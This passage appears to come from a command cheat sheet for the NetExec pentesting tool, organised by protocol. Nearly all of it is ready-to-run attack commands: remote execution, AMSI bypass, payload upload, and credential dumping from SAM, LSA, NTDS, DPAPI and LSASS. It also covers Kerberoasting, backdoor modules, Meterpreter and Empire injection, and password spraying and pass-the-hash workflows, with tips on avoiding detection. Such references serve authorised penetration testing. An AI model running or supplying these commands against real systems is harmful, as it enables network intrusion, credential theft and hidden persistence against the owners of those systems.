-u admin -p pass --spider C$ --regex \".*\\.txt$\"\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --content       # Search file content\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --depth 3       # Max recursion depth\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --only-files    # Files only\nnxc smb 192.168.1.10 -u admin -p pass --spider C$ --exclude-dirs Windows,System32\n```\n\n### Command Execution\n```bash\nnxc smb 192.168.1.10 -u admin -p pass -x \"whoami\"                    # CMD\nnxc smb 192.168.1.10 -u admin -p pass -X '$PSVersionTable'           # PowerShell\nnxc smb 192.168.1.10 -u admin -p pass --exec-method smbexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method atexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method wmiexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --exec-method mmcexec -x \"whoami\"\nnxc smb 192.168.1.10 -u admin -p pass --no-output -x \"command\"       # Don't retrieve output\n```\n\n### PowerShell Options\n```bash\nnxc smb 192.168.1.10 -u admin -p pass -X '$PSVersionTable' --obfs          # Obfuscate\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --amsi-bypass bypass.ps1\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --force-ps32            # Force 32-bit\nnxc smb 192.168.1.10 -u admin -p pass -X 'command' --no-encode             # Don't encode\nnxc smb 192.168.1.10 -u admin -p pass --clear-obfscripts                   # Clear cache\n```\n\n### File Operations\n```bash\nnxc smb 192.168.1.10 -u admin -p pass --get-file \"\\\\Windows\\\\Temp\\\\file.txt\" ./local.txt\nnxc smb 192.168.1.10 -u admin -p pass --put-file ./payload.exe \"\\\\Windows\\\\Temp\\\\payload.exe\"\nnxc smb 192.168.1.10 -u admin -p pass --get-file \"\\\\file.txt\" ./out.txt --append-host\n```\n\n### Credential Dumping\n```bash\n# SAM Database\nnxc smb 192.168.1.10 -u admin -p pass --sam                        # Default method\nnxc smb 192.168.1.10 -u admin -p pass --sam secdump                # Using secdump\nnxc smb 192.168.1.10 -u admin -p pass --sam regdump                # Using regdump\n\n# LSA Secrets\nnxc smb 192.168.1.10 -u admin -p pass --lsa                        # Default method\nnxc smb 192.168.1.10 -u admin -p pass --lsa secdump                # Using secdump\nnxc smb 192.168.1.10 -u admin -p pass --lsa regdump                # Using regdump\n\n# NTDS (Domain Controller)\nnxc smb dc01.domain.local -u admin -p pass --ntds                  # Default (drsuapi)\nnxc smb dc01.domain.local -u admin -p pass --ntds vss              # Using VSS\nnxc smb dc01.domain.local -u admin -p pass --ntds drsuapi          # Using drsuapi\nnxc smb dc01.domain.local -u admin -p pass --ntds --user admin     # Specific user\nnxc smb dc01.domain.local -u admin -p pass --ntds --enabled        # Enabled accounts only\n\n# DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi                      # Dump DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi cookies              # Include cookies\nnxc smb 192.168.1.10 -u admin -p pass --dpapi nosystem             # Exclude SYSTEM\nnxc smb 192.168.1.10 -u admin -p pass --dpapi --mkfile masterkeys.txt\nnxc smb 192.168.1.10 -u admin -p pass --dpapi --pvk backupkey.pvk\n\n# SCCM\nnxc smb 192.168.1.10 -u admin -p pass --sccm                       # Default (wmi)\nnxc smb 192.168.1.10 -u admin -p pass --sccm wmi                   # Using WMI\nnxc smb 192.168.1.10 -u admin -p pass --sccm disk                  # Using disk\n```\n\n### SMB Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\n# Vulnerability Checks\nnxc smb 192.168.1.10 -u user -p pass -M ms17-010                   # EternalBlue\nnxc smb 192.168.1.10 -u user -p pass -M zerologon                  # CVE-2020-1472\nnxc smb 192.168.1.10 -u user -p pass -M nopac                      # CVE-2021-42278/42287\nnxc smb 192.168.1.10 -u user -p pass -M printnightmare             # PrintNightmare\nnxc smb 192.168.1.10 -u user -p pass -M remove-mic                 # CVE-2019-1040\nnxc smb 192.168.1.10 -u user -p pass -M smbghost                   # CVE-2020-0796\nnxc smb 192.168.1.10 -u user -p pass -M coerce_plus                # Coercion vulns\nnxc smb 192.168.1.10 -u user -p pass -M timeroast                  # Timeroasting\n\n# Enumeration\nnxc smb 192.168.1.10 -u user -p pass -M enum_av                    # AV products\nnxc smb 192.168.1.10 -u user -p pass -M enum_ca                    # ADCS CAs\nnxc smb 192.168.1.10 -u user -p pass -M ioxidresolver              # Additional interfaces\nnxc smb 192.168.1.10 -u user -p pass -M spooler                    # Print spooler\nnxc smb 192.168.1.10 -u user -p pass -M webdav                     # WebClient service\nnxc smb 192.168.1.10 -u user -p pass -M spider_plus                # Spider shares\nnxc smb 192.168.1.10 -u user -p pass -M spider_plus -o READ_ONLY=false\n\n# Password Hunting\nnxc smb 192.168.1.10 -u user -p pass -M gpp_password               # GPP passwords\nnxc smb 192.168.1.10 -u user -p pass -M gpp_autologin              # GPP autologin\n\n# Backdoors\nnxc smb 192.168.1.10 -u user -p pass -M drop-sc                    # Drop searchConnector\nnxc smb 192.168.1.10 -u user -p pass -M scuffy                     # Drop .scf files\nnxc smb 192.168.1.10 -u user -p pass -M slinky                     # Create LNK backdoors\n\n# Computer Management\nnxc smb 192.168.1.10 -u user -p pass -M add-computer               # Add/delete computer\nnxc smb 192.168.1.10 -u user -p pass -M backup_operator            # Backup operator exploit\n```\n\n#### HIGH PRIVILEGE MODULES (requires admin)\n```bash\n# Credential Dumping\nnxc smb 192.168.1.10 -u admin -p pass -M lsassy                    # LSASS dump\nnxc smb 192.168.1.10 -u admin -p pass -M nanodump                  # Alternative LSASS\nnxc smb 192.168.1.10 -u admin -p pass -M procdump                  # Process dump\nnxc smb 192.168.1.10 -u admin -p pass -M handlekatz                # Handle dump\nnxc smb 192.168.1.10 -u admin -p pass -M dpapi_hash                # DPAPI masterkeys\nnxc smb 192.168.1.10 -u admin -p pass -M hash_spider               # Recursive LSASS\nnxc smb 192.168.1.10 -u admin -p pass -M ntdsutil                  # NTDS with ntdsutil\n\n# Application Credentials\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_discover          # Find KeePass\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_trigger           # KeePass trigger\nnxc smb 192.168.1.10 -u admin -p pass -M mobaxterm                 # MobaXterm creds\nnxc smb 192.168.1.10 -u admin -p pass -M mremoteng                 # mRemoteNG creds\nnxc smb 192.168.1.10 -u admin -p pass -M putty                     # PuTTY keys\nnxc smb 192.168.1.10 -u admin -p pass -M rdcman                    # RDCMan creds\nnxc smb 192.168.1.10 -u admin -p pass -M winscp                    # WinSCP creds\nnxc smb 192.168.1.10 -u admin -p pass -M vnc                       # VNC passwords\nnxc smb 192.168.1.10 -u admin -p pass -M wifi                      # WiFi passwords\nnxc smb 192.168.1.10 -u admin -p pass -M veeam                     # Veeam DB creds\nnxc smb 192.168.1.10 -u admin -p pass -M msol                      # Azure AD Connect\nnxc smb 192.168.1.10 -u admin -p pass -M teams_localdb             # Teams SSO cookie\nnxc smb 192.168.1.10 -u admin -p pass -M wam                       # Token Broker Cache\n\n# Enumeration\nnxc smb 192.168.1.10 -u admin -p pass -M enum_dns                  # DNS records (WMI)\nnxc smb 192.168.1.10 -u admin -p pass -M get_netconnections        # Network connections\nnxc smb 192.168.1.10 -u admin -p pass -M bitlocker                 # BitLocker status\nnxc smb 192.168.1.10 -u admin -p pass -M hyperv-host               # HyperV host\nnxc smb 192.168.1.10 -u admin -p pass -M iis                       # IIS app pool creds\nnxc smb 192.168.1.10 -u admin -p pass -M install_elevated          # AlwaysInstallElevated\nnxc smb 192.168.1.10 -u admin -p pass -M ntlmv1                    # NTLMv1 enabled\nnxc smb 192.168.1.10 -u admin -p pass -M runasppl                  # RunAsPPL status\nnxc smb 192.168.1.10 -u admin -p pass -M uac                       # UAC status\nnxc smb 192.168.1.10 -u admin -p pass -M wcc                       # Security config\nnxc smb 192.168.1.10 -u admin -p pass -M security-questions        # Security Q&A\n\n# File Operations\nnxc smb 192.168.1.10 -u admin -p pass -M notepad++                 # Unsaved files\nnxc smb 192.168.1.10 -u admin -p pass -M powershell_history        # PS history\nnxc smb 192.168.1.10 -u admin -p pass -M recent_files              # Recent files\nnxc smb 192.168.1.10 -u admin -p pass -M snipped                   # Snipping Tool\n\n# Persistence & Execution\nnxc smb 192.168.1.10 -u admin -p pass -M empire_exec               # Empire agent\nnxc smb 192.168.1.10 -u admin -p pass -M met_inject                # Meterpreter\nnxc smb 192.168.1.10 -u admin -p pass -M web_delivery              # Web delivery\nnxc smb 192.168.1.10 -u admin -p pass -M impersonate               # Token impersonation\nnxc smb 192.168.1.10 -u admin -p pass -M pi                        # Process injection\nnxc smb 192.168.1.10 -u admin -p pass -M schtask_as                # Scheduled task\n\n# Configuration Changes\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable      # Enable RDP\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=disable     # Disable RDP\nnxc smb 192.168.1.10 -u admin -p pass -M shadowrdp                 # Shadow RDP\nnxc smb 192.168.1.10 -u admin -p pass -M wdigest -o ACTION=enable  # Enable WDigest\nnxc smb 192.168.1.10 -u admin -p pass -M remote-uac                # Remote UAC\n\n# Registry Operations\nnxc smb 192.168.1.10 -u admin -p pass -M reg-query                 # Registry query\nnxc smb 192.168.1.10 -u admin -p pass -M reg-winlogon              # Winlogon creds\n\n# Utility\nnxc smb 192.168.1.10 -u admin -p pass -M test_connection           # Test connectivity\n```\n\n---\n\n## LDAP Protocol (Port 389/636)\n\n### Basic Enumeration\n```bash\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users           # Enumerate all users\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users user123   # Specific user\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users-export out.txt\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --groups          # Enumerate all groups\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --groups \"Domain Admins\"\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --computers       # Enumerate computers\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --dc-list         # List DCs\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --get-sid         # Get domain SID\n```\n\n### Advanced Queries\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --admin-count               # adminCount=1 users\nnxc ldap 192.168.1.10 -u user -p pass --trusted-for-delegation    # Trusted delegation\nnxc ldap 192.168.1.10 -u user -p pass --password-not-required     # Empty passwords allowed\nnxc ldap 192.168.1.10 -u user -p pass --active-users              # Active accounts only\nnxc ldap 192.168.1.10 -u user -p pass --find-delegation           # Delegation relationships\n\n# GMSA\nnxc ldap 192.168.1.10 -u user -p pass --gmsa                       # Enumerate GMSA\nnxc ldap 192.168.1.10 -u user -p pass --gmsa-convert-id gmsa_name\nnxc ldap 192.168.1.10 -u user -p pass --gmsa-decrypt-lsa lsa_data\n\n# Custom LDAP Query\nnxc ldap 192.168.1.10 -u user -p pass --query \"(objectClass=user)\" \"cn,sAMAccountName\"\nnxc ldap 192.168.1.10 -u user -p pass --base-dn \"OU=Users,DC=domain,DC=local\"\n```\n\n### Kerberoasting & ASREPRoasting\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --kerberoasting output.txt\nnxc ldap 192.168.1.10 -u user -p pass --asreproast output.txt\n```\n\n### Bloodhound Collection\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c All\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Default\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c DCOnly\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Session,LoggedOn\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Group,LocalAdmin,ACL\n```\n\n### LDAP Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc ldap 192.168.1.10 -u user -p pass -M adcs                      # Find ADCS/PKI\nnxc ldap 192.168.1.10 -u user -p pass -M daclread                  # Read DACLs\nnxc ldap 192.168.1.10 -u user -p pass -M enum_trusts               # Trust relationships\nnxc ldap 192.168.1.10 -u user -p pass -M find-computer             # Find computers\nnxc ldap 192.168.1.10 -u user -p pass -M get-desc-users            # User descriptions\nnxc ldap 192.168.1.10 -u user -p pass -M get-network               # DNS records/IPs\nnxc ldap 192.168.1.10 -u user -p pass -M get-unixUserPassword      # Unix passwords\nnxc ldap 192.168.1.10 -u user -p pass -M get-userPassword          # User passwords\nnxc ldap 192.168.1.10 -u user -p pass -M groupmembership           # User group membership\nnxc ldap 192.168.1.10 -u user -p pass -M laps                      # LAPS passwords\nnxc ldap 192.168.1.10 -u user -p pass -M ldap-checker              # LDAP signing/binding\nnxc ldap 192.168.1.10 -u user -p pass -M maq                       # MachineAccountQuota\nnxc ldap 192.168.1.10 -u user -p pass -M obsolete                  # Obsolete OS\nnxc ldap 192.168.1.10 -u user -p pass -M pre2k                     # Pre-created accounts\nnxc ldap 192.168.1.10 -u user -p pass -M pso                       # Password policies\nnxc ldap 192.168.1.10 -u user -p pass -M sccm                      # SCCM infrastructure\nnxc ldap 192.168.1.10 -u user -p pass -M subnets                   # Sites and subnets\nnxc ldap 192.168.1.10 -u user -p pass -M user-desc                 # User descriptions\nnxc ldap 192.168.1.10 -u user -p pass -M whoami                    # Current user details\n```\n\n---\n\n## WinRM Protocol (Port 5985/5986)\n\n### Basic Usage\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass\nnxc winrm 192.168.1.10 -u admin -H \nnxc winrm 192.168.1.10 -u admin -p pass -d DOMAIN\nnxc winrm 192.168.1.10 -u admin -p pass --local-auth\nnxc winrm 192.168.1.10 -u admin -p pass --laps                     # LAPS auth\n```\n\n### Port Configuration\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass --port 5985                # HTTP only\nnxc winrm 192.168.1.10 -u admin -p pass --port 5986                # HTTPS only\nnxc winrm 192.168.1.10 -u admin -p pass --port 5985 5986           # Both ports\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto http         # HTTP only\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto https        # HTTPS only\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto http https   # Both protocols\nnxc winrm 192.168.1.10 -u admin -p pass --http-timeout 15          # Timeout\n```\n\n### Command Execution\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass -x \"whoami\"\nnxc winrm 192.168.1.10 -u admin -p pass -X '$PSVersionTable'\nnxc winrm 192.168.1.10 -u admin -p pass -x \"ipconfig /all\"\nnxc winrm 192.168.1.10 -u admin -p pass --no-output -x \"command\"\n```\n\n### Credential Dumping\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass --sam                      # Dump SAM\nnxc winrm 192.168.1.10 -u admin -p pass --lsa                      # Dump LSA\nnxc winrm 192.168.1.10 -u admin -p pass --dump-method cmd          # Using cmd\nnxc winrm 192.168.1.10 -u admin -p pass --dump-method powershell   # Using PowerShell\n```\n\n### WinRM Modules\n```bash\n# No modules available for WinRM protocol in current version\n```\n\n---\n\n## SSH Protocol (Port 22)\n\n### Authentication\n```bash\nnxc ssh 192.168.1.10 -u root -p password\nnxc ssh 192.168.1.10 -u root -p passwords.txt\nnxc ssh 192.168.1.10 -u root --key-file id_rsa\nnxc ssh 192.168.1.10 -u root --key-file id_rsa -p passphrase\nnxc ssh 192.168.1.10 -u users.txt -p passwords.txt\nnxc ssh 192.168.1.10 -u root -p pass --port 2222\nnxc ssh 192.168.1.10 -u root -p pass --ssh-timeout 20\n```\n\n### Command Execution\n```bash\nnxc ssh 192.168.1.10 -u root -p pass -x \"cat /etc/passwd\"\nnxc ssh 192.168.1.10 -u root -p pass -x \"uname -a\"\nnxc ssh 192.168.1.10 -u root -p pass -x \"id\"\nnxc ssh 192.168.1.10 -u root -p pass --no-output -x \"command\"\n```\n\n### Sudo Operations\n```bash\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check                  # Check sudo privs\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check-method sudo-stdin\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check-method mkfifo\nnxc ssh 192.168.1.10 -u user -p pass --get-output-tries 10\n```\n\n### File Operations\n```bash\nnxc ssh 192.168.1.10 -u root -p pass --put-file local.txt /tmp/remote.txt\nnxc ssh 192.168.1.10 -u root -p pass --get-file /etc/passwd ./passwd.txt\n```\n\n### SSH Modules\n```bash\n# No modules available for SSH protocol in current version\n```\n\n---\n\n## RDP Protocol (Port 3389)\n\n### Check Access\n```bash\nnxc rdp 192.168.1.10 -u admin -p password\nnxc rdp 192.168.1.10 -u admin -H \nnxc rdp 192.168.1.10 -u users.txt -p passwords.txt -d DOMAIN\nnxc rdp 192.168.1.10 -u admin -p pass --local-auth\nnxc rdp 192.168.1.10 -u admin -p pass --port 3390\nnxc rdp 192.168.1.10 -u admin -p pass --rdp-timeout 10\n```\n\n### Screenshots\n```bash\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot --screentime 10\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot --res 1920x1080\nnxc rdp 192.168.1.10 -u admin -p pass --nla-screenshot             # If NLA disabled\n```\n\n### RDP Modules\n```bash\n# No modules available for RDP protocol in current version\n```\n\n---\n\n## MSSQL Protocol (Port 1433)\n\n### Authentication\n```bash\nnxc mssql 192.168.1.10 -u sa -p password\nnxc mssql 192.168.1.10 -u sa -p password --local-auth\nnxc mssql 192.168.1.10 -u user -p pass -d DOMAIN\nnxc mssql 192.168.1.10 -u user -p pass -d DOMAIN -k              # Kerberos\nnxc mssql 192.168.1.10 -u sa -H \nnxc mssql 192.168.1.10 -u sa -p pass --port 1434\nnxc mssql 192.168.1.10 -u sa -p pass --mssql-timeout 10\n```\n\n### Queries\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT @@version\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT name FROM sys.databases\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT name FROM sys.server_principals\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"EXEC sp_helprotect\"\n```\n\n### Command Execution\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -x \"whoami\"                 # via xp_cmdshell\nnxc mssql 192.168.1.10 -u sa -p pass -X 'Get-Host'               # PowerShell\nnxc mssql 192.168.1.10 -u sa -p pass --no-output -x \"command\"\n```\n\n### PowerShell Options\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --force-ps32\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --obfs\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --amsi-bypass bypass.ps1\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --no-encode\nnxc mssql 192.168.1.10 -u sa -p pass --clear-obfscripts\n```\n\n### File Operations\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass --put-file local.txt C:\\\\Temp\\\\remote.txt\nnxc mssql 192.168.1.10 -u sa -p pass --get-file C:\\\\Temp\\\\file.txt ./local.txt\n```\n\n### Enumeration\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass --rid-brute                  # RID bruteforce\nnxc mssql 192.168.1.10 -u sa -p pass --rid-brute 5000\n```\n\n### MSSQL Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc mssql 192.168.1.10 -u user -p pass -M enum_impersonate        # Impersonation privs\nnxc mssql 192.168.1.10 -u user -p pass -M enum_logins             # SQL logins\nnxc mssql 192.168.1.10 -u user -p pass -M exec_on_link            # Execute on linked server\nnxc mssql 192.168.1.10 -u user -p pass -M link_enable_xp          # Enable xp_cmdshell on link\nnxc mssql 192.168.1.10 -u user -p pass -M link_xpcmd              # Run xp_cmdshell on link\nnxc mssql 192.168.1.10 -u user -p pass -M mssql_coerce            # Execute arbitrary SQL\nnxc mssql 192.168.1.10 -u user -p pass -M mssql_priv              # Enumerate/exploit privs\n```\n\n#### HIGH PRIVILEGE MODULES\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -M empire_exec               # Empire agent\nnxc mssql 192.168.1.10 -u sa -p pass -M enum_links                # Enumerate linked servers\nnxc mssql 192.168.1.10 -u sa -p pass -M met_inject                # Meterpreter injection\nnxc mssql 192.168.1.10 -u sa -p pass -M nanodump                  # LSASS dump\nnxc mssql 192.168.1.10 -u sa -p pass -M test_connection           # Test connectivity\nnxc mssql 192.168.1.10 -u sa -p pass -M web_delivery              # Web delivery\n```\n\n---\n\n## FTP Protocol (Port 21)\n\n### Authentication\n```bash\nnxc ftp 192.168.1.10 -u admin -p password\nnxc ftp 192.168.1.10 -u anonymous -p ''\nnxc ftp 192.168.1.10 -u users.txt -p passwords.txt\nnxc ftp 192.168.1.10 -u admin -p pass --port 2121\n```\n\n### File Operations\n```bash\nnxc ftp 192.168.1.10 -u admin -p pass --ls                        # List root\nnxc ftp 192.168.1.10 -u admin -p pass --ls /var/www\nnxc ftp 192.168.1.10 -u admin -p pass --get file.txt\nnxc ftp 192.168.1.10 -u admin -p pass --put local.txt remote.txt\n```\n\n### FTP Modules\n```bash\n# No modules available for FTP protocol in current version\n```\n\n---\n\n## VNC Protocol (Port 5900)\n\n### Authentication\n```bash\nnxc vnc 192.168.1.10 -u admin -p password\nnxc vnc 192.168.1.10 -u admin -p passwords.txt\nnxc vnc 192.168.1.10 -u admin -p pass --port 5901\nnxc vnc 192.168.1.10 -u admin -p pass --vnc-sleep 5               # Rate limiting\n```\n\n### Screenshot\n```bash\nnxc vnc 192.168.1.10 -u admin -p pass --screenshot\nnxc vnc 192.168.1.10 -u admin -p pass --screenshot --screentime 5\n```\n\n### VNC Modules\n```bash\n# No modules available for VNC protocol in current version\n```\n\n---\n\n## NFS Protocol (Port 111)\n\n### Enumeration\n```bash\nnxc nfs 192.168.1.10                                               # Basic enumeration\nnxc nfs 192.168.1.10 --shares                                      # List shares\nnxc nfs 192.168.1.10 --enum-shares                                 # Enumerate shares (depth 3)\nnxc nfs 192.168.1.10 --enum-shares 5                               # Custom depth\nnxc nfs 192.168.1.10 --port 2049\nnxc nfs 192.168.1.10 --nfs-timeout 10\n```\n\n### Share Operations\n```bash\nnxc nfs 192.168.1.10 --share /export --ls                          # List share root\nnxc nfs 192.168.1.10 --share /export --ls /path/to/dir\nnxc nfs 192.168.1.10 --share /export --get-file remote.txt local.txt\nnxc nfs 192.168.1.10 --share /export --put-file local.txt remote.txt\n```\n\n### NFS Modules\n```bash\n# No modules available for NFS protocol in current version\n```\n\n---\n\n## WMI Protocol (Port 135)\n\n### Basic Usage\n```bash\nnxc wmi 192.168.1.10 -u admin -p password\nnxc wmi 192.168.1.10 -u admin -H \nnxc wmi 192.168.1.10 -u admin -p pass -d DOMAIN\nnxc wmi 192.168.1.10 -u admin -p pass --local-auth\nnxc wmi 192.168.1.10 -u admin -p pass --rpc-timeout 5\n```\n\n### WMI Queries\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Process\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Service\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_ComputerSystem\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi-namespace \"root\\cimv2\"\n```\n\n### Command Execution\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-method wmiexec -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-method wmiexec-event -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-timeout 10\nnxc wmi 192.168.1.10 -u admin -p pass --no-output -x \"command\"\n```\n\n### WMI Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc wmi 192.168.1.10 -u user -p pass -M ioxidresolver              # Additional interfaces\nnxc wmi 192.168.1.10 -u user -p pass -M spooler                    # Print spooler\nnxc wmi 192.168.1.10 -u user -p pass -M zerologon                  # Zerologon check\n```\n\n#### HIGH PRIVILEGE MODULES\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass -M bitlocker                 # BitLocker status\nnxc wmi 192.168.1.10 -u admin -p pass -M enum_dns                  # DNS records\nnxc wmi 192.168.1.10 -u admin -p pass -M get_netconnections        # Network connections\nnxc wmi 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable      # Enable RDP\nnxc wmi 192.168.1.10 -u admin -p pass -M rdp -o ACTION=disable     # Disable RDP\n```\n\n---\n\n## General Flags & Options\n\n### Threading & Performance\n```bash\n-t 256                       # Number of threads (default: 256)\n--timeout 10                 # Connection timeout in seconds\n--jitter 5                   # Random delay between requests (seconds)\n```\n\n### Output & Logging\n```bash\n--verbose                    # Verbose output\n--debug                      # Debug mode\n--log output.log             # Save output to file\n--no-progress                # Disable progress bar\n```\n\n### DNS Options\n```bash\n-6                           # Force IPv6\n--dns-server 8.8.8.8         # Custom DNS server\n--dns-tcp                    # Use TCP for DNS queries\n--dns-timeout 3              # DNS timeout in seconds\n```\n\n### Credential Database\n```bash\n-id 1                        # Use credential ID from database\n-id 1 2 3                    # Use multiple credential IDs\n```\n\n### Server Options\n```bash\n--server https               # Use HTTPS server (default)\n--server http                # Use HTTP server\n--server-host 0.0.0.0        # Bind server to IP\n--server-port 8000           # Server port\n--connectback-host IP        # Connectback IP for remote system\n```\n\n### Database\n```bash\ncmedb                        # Access NXC database\nexport smb                   # Export SMB results\n```\n\n### Modules\n```bash\nnxc smb -L                              # List all SMB modules\nnxc smb -M  --options           # Show module options\n```\n\n---\n\n## Common Attack Workflows\n\n### 1. Initial Enumeration\n```bash\n# Find hosts and check SMB signing\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt\n\n# Anonymous/Guest enumeration\nnxc smb 192.168.1.0/24 -u '' -p ''\nnxc smb 192.168.1.0/24 -u 'guest' -p ''\n\n# Check multiple protocols\nnxc smb 192.168.1.0/24\nnxc rdp 192.168.1.0/24 -u '' -p ''\nnxc winrm 192.168.1.0/24 -u '' -p ''\n```\n\n### 2. Password Spraying\n```bash\n# Single password spray (safe)\nnxc smb targets.txt -u users.txt -p 'Winter2024!' -d DOMAIN --continue-on-success\n\n# With fail limits\nnxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 3 --fail-limit 5\n\n# Check valid creds across multiple protocols\nnxc smb 192.168.1.10 -u admin -p pass\nnxc winrm 192.168.1.10 -u admin -p pass\nnxc mssql 192.168.1.10 -u admin -p pass\nnxc rdp 192.168.1.10 -u admin -p pass\n```\n\n### 3. Credential Dumping\n```bash\n# Local SAM\nnxc smb 192.168.1.10 -u admin -p pass --sam\n\n# LSASS memory\nnxc smb 192.168.1.10 -u admin -p pass -M lsassy\nnxc smb 192.168.1.10 -u admin -p pass -M nanodump\n\n# Domain Controller NTDS\nnxc smb dc01.domain.local -u admin -p pass --ntds\nnxc smb dc01.domain.local -u admin -p pass --ntds --enabled\n\n# DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi cookies\n```\n\n### 4. Domain Enumeration\n```bash\n# Users and groups\nnxc ldap dc01.domain.local -u user -p pass --users --groups\n\n# Kerberoastable accounts\nnxc ldap dc01.domain.local -u user -p pass --kerberoasting kerberoast.txt\n\n# ASREProastable accounts\nnxc ldap dc01.domain.local -u user -p pass --asreproast asrep.txt\n\n# Bloodhound data\nnxc ldap dc01.domain.local -u user -p pass --bloodhound -c All\n\n# Find vulnerabilities\nnxc ldap dc01.domain.local -u user -p pass -M adcs\nnxc ldap dc01.domain.local -u user -p pass -M laps\n```\n\n### 5. Lateral Movement\n```bash\n# Pass-the-Hash\nnxc smb targets.txt -u admin -H  -x \"hostname\"\n\n# Execute on multiple targets\nnxc smb targets.txt -u admin -p pass -x \"whoami\"\nnxc winrm targets.txt -u admin -p pass -x \"ipconfig\"\n\n# Spray hashes\nnxc smb targets.txt -u users.txt -H hashes.txt --continue-on-success\n```\n\n### 6. Post-Exploitation\n```bash\n# Persistence\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable\nnxc smb 192.168.1.10 -u admin -p pass -M wdigest -o ACTION=enable\n\n# Credential hunting\nnxc smb 192.168.1.10 -u admin -p pass -M spider_plus\nnxc smb 192.168.1.10 -u admin -p pass -M gpp_password\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_discover\n\n# Application credentials\nnxc smb 192.168.1.10 -u admin -p pass -M putty\nnxc smb 192.168.1.10 -u admin -p pass -M winscp\nnxc smb 192.168.1.10 -u admin -p pass -M wifi\n```\n\n---\n\n## Tips & Best Practices\n\n- Use `--continue-on-success` for password spraying to find all valid credentials\n- Use `--no-bruteforce` to stop after first valid credential per host (avoid lockouts)\n- Add `--jitter` to introduce random delays and avoid detection\n- Use `--ufail-limit` and `--fail-limit` to prevent account lockouts\n- Check SMB signing with basic scan before relay attacks\n- Use LDAP for domain enumeration (less noisy than SMB)\n- Pass-the-Hash only needs NTLM hash (not LM)\n- Always specify `-d DOMAIN` or `--local-auth` explicitly\n- Use `cmedb` to review all findings in the database\n- Module options: `-M module_name -o OPTION=value`\n- Rate limit yourself to avoid account lockouts and detection\n- Use `--no-progress` when logging output to files\n- Test authentication across multiple protocols (SMB, WinRM, RDP, MSSQL)\n\n---\n\n## Resources\n\n- **GitHub**: https://github.com/Pennyw0rth/NetExec\n- **Wiki**: https://www.netexec.wiki/\n- **Modules**: https://www.netexec.wiki/getting-started/using-modules", "creation_timestamp": "2026-05-26T06:17:22.000000Z"}]}